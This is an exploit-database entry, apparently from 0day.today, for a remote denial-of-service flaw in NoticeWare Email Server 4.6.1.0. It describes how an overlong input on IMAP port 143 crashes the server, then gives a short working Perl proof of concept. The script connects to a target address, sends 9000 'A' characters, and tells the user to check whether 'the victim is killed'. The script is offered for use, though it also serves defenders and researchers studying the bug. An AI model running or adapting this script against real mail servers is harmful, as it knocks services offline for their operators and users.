Noticeware Email Server 4.6.1.0 Denial of Service Exploit

2008-04-01T00:00:00
ID 1337DAY-ID-6526
Type zdt
Reporter Ray
Modified 2008-04-01T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =========================================================
Noticeware Email Server 4.6.1.0 Denial of Service Exploit
=========================================================




#NoticeWare Email Server

#Application:	Noticeware Email Server
#Version: 	4.6.1.0 (NoticeWare Email Server)
#Bugs:		Denial Of Service/ Remote Crash
#Exploitation:	Remote
#Date:		1st April 2008
#Author:		Ray
#Email:		[email protected]
#Platforms:	Tested on XP/2003
#Taken from :	http://www.noticeware.com/noticemail.htm

#"The NoticeWare? Email Server NG is a high performance, multi-threaded email server for Windows #2000/2003/XP/Vista which supports IMAP/POP3 and SMTP protocols. Whether you are hosting your own email or #collecting mail from your ISP, the NoticeWare? Email Server will provide everything you need to run a #secure and dependable email system. Ideal for any size of business."
##########################################################################################################

#1) Denial Of Service

#Denial of service occurs when the mailserver.exe crashes after receiving huge number of characters in #IMAP port 143 [ECX =0000000,DL = ??] , the admin application will still be running but if user clicked #on Send/Receive or any other buttons the application will crash .

##########################################################################################################

#A Simple POC by Ray, dont forget to change the host address

use IO::Socket;
print "\n++ NoticeWare DOS";
print "\n++ Initiating";
my $sock = new IO::Socket::INET (
				  PeerAddr => '192.168.2.7',
				  PeerPort => '143',
				  Proto => 'TCP',
				  );
die "Could not initiate connection $!\n" unless $sock;

print $sock "A" x 9000 . "\n";
print "\n++ Have to wait for a few seconds before closing the socket";
sleep(6);
close ($sock);
print "\n++ NC and check if the victim is killed \r\n";



#  0day.today [2018-03-09]  #